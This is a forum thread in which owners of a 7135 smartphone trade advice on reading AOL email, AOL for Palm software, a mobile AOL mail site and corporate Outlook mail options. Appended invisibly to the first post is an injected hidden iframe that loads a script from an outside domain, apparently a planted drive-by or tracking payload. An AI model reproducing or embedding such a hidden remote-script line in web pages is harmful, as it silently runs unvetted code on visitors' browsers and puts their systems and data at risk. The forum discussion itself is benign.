+ Reply to Thread
Page 1 of 2 1 2 LastLast

Thread: AOL email

AOL email

I have ordered my 7135 and am eagerly awaiting its arrival. Does anyone know how I can retrieve aol email> Do I get aol for palm or is there another service like sanpper mail that may let me open attachments etc>
    Interested in hearing anyones thought on this<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

aol

I went to the aol site and looked for aol anywhere and got the palm app works good for me.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Re: aol

The one that is $19.95? I thought it used to be free?!?!?!

Jeff

Originally posted by GREGHARKINS
    I went to the aol site and looked for aol anywhere and got the palm app works good for me.
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Don't buy it. The Browser, not the one that defaults to the brower key, but the browser that is called just "browser" has AOL Mail "built-in" and I have used it successfully. But only after spending an hour on the phone with Verizon to get the phone to access the web.

Mike

PHO
    Broward County Florida, "Home of the Hanging Chad"
    http://download.com.com/3000-2362-32...ml?legacy=cnet

you can download aol for palm here from download.com. I have been using it for a few months works pretty well
    Please check out my new radio show - you can listen live online Saturdays from 9-10am

www.grtalk.com

"Aaron the Research Dept."

BROWSER

ARE U TALKING ABOUT THE WAP BROWSER?
    GREG HARKINS
    www.bringingfuntoyou.com

Sounds like the OpenWave WAP Browser that is just called "Browser" on its app icon.
    ~'kito
    pdaPhoneHome Moderator

Ok- I still need help- I have been on the phone with Verizons data tech support and also AOL (THye are useless) and I did BUY the $20 Aol software and can still not get aol email. I can get on the web thru the eis web but when I sign on to aol it will not open. Any ideas? Has anyone been able to access aol mail thru the 7135?

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Does anyone have a URL for the pay program? I'm an AOL beta tester, and have been using AOL mail for Palm 3.0, which lets you log on via a modem, direct internet, or when you hotsync. It's a shame it hasn't been released publicly yet.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Looking on the web, I found it at http://www.handango.com/aol/PlatformProductDetail.jsp?platformId=1&productId=43335&productType=2&siteId=506, and it looks like the product I've been using.
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Doesn't work

That is the right one and I downloaded it but I can not get on aol thru it nor can aol get me on thru it. I finally pd. verizon from mobile web and got on that way but it is not so full featured. I am open to any ideas or help.
    thanks

aol

I used the same aol program and it works fine for me.
    GREG HARKINS
    www.bringingfuntoyou.com

new mobile site for AOL mail

Hey all

I am on the beta list for AOL. They have a new site, designed for T-Mobile sidekick users.

http://dmail.aol.com

It seems to work for the 7135, but the formatting is off a little.

Check it out, with your 7135, if you wish, but don't tell em I sent ya. I'd like to stay on the beta list. :spin

Jeff
    Jeff
    Tampa FL

I had my 7135 delivered to my office, and I couldn't get AOL work. When I came home last night, worked like a charm. :dunno

aol on 7135

just download the aol for palm 3.0 (its 19.95). It works great...flawless. Not a single problem. Superfast, and you can IM as well.....I just wish i could get my outlook email off the outlook express server at work....

AOL is a no brainer....its perfect for this phone.
    cheers

Re: aol on 7135

Originally posted by achechtmd
    just download the aol for palm 3.0 (its 19.95). It works great...flawless. Not a single problem. Superfast, and you can IM as well.....I just wish i could get my outlook email off the outlook express server at work....

AOL is a no brainer....its perfect for this phone.
    For Outlook Mail off your corporate server there are a few options to try.

NotifyLink - www.notifycorp.com
    Wireless Knowledge - www.wirelessknowledge.com/7135/
    Visto - http://www.visto.com

I bought the NotifyLink. Seems to be OK. I was able to set it up myself. Seems to do what I need, but I will end up using quite a few minutes from my plan.

Tried Wireless Knowledge, but could not get it set up without IT assistance, and my IT department has not gotten to me yet.

Someone else here suggested Visto.

There are a few threads going here about this. Search on 'CORP E-MAIL' and you should get a few.

Jeff
    Jeff
    Tampa FL

Sometimes i get message SNAC not handled when I try to use the AOL, but not always. WHY do i get this message?
    cheers

AOL Bug in Find

achechtmd -

have you tried to do a find - try it. I installed AOL - worked great. Went to do a find - got jammed when searhcing AOL - takes about 20 minutes to get thru and misses stuff that's there.

I deleted AOL to make sure - sure enough - everything works fine during a find. Put it back on - same thing - serach takes forever - and still misses stuff that is there.

Yep, I reported the Bug find while it was in Beta, I'm dissapointed they haven't fixed it yet. However, I'm using FindIgnoreHack, which works like a charm!

By the way, what version are you using (menu->about)? I'm using 3.0, build 029.

using same build - thanks